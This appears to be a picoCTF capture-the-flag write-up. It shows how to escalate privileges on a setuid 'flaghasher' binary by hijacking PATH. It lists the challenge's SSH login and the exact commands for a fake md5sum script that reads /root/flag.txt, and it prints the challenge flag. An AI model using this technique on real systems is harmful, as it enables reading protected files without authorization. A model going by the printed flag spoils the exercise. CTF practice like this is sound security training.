Description
The flaghasher binary runs with elevated privileges but only prints `md5sum /root/flag.txt`. Hijack the PATH so md5sum points to your own script that cats the flag.
Setup
SSH to shape-facility.picoctf.net -p 51426 (password 8d076785) and inspect `flaghasher`.
Copy the binary locally if desired, but you can exploit it directly on the remote host.
ssh -p 51426 ctf-player@shape-facility.picoctf.net
echo "/bin/cat /root/flag.txt" > md5sum && chmod +x md5sum
export PATH=.:$PATH && ./flaghasher
Solution
- Step 1Discover the helper callstrings flaghasher reveals `/bin/bash -c 'md5sum /root/flag.txt'`. Because md5sum is resolved via PATH, you can substitute your own executable.
- Step 2Drop in a fake md5sumCreate a script named md5sum that simply calls `/bin/cat /root/flag.txt`, mark it executable, and `export PATH=.:$PATH`. Running flaghasher now prints the flag instead of a hash.
Flag
picoCTF{sy5teM_b!n@riEs_4r3_5c@red_0f_yoU_bfa4...}
Classic PATH hijacking, so always check PATH order when privileged scripts invoke system tools.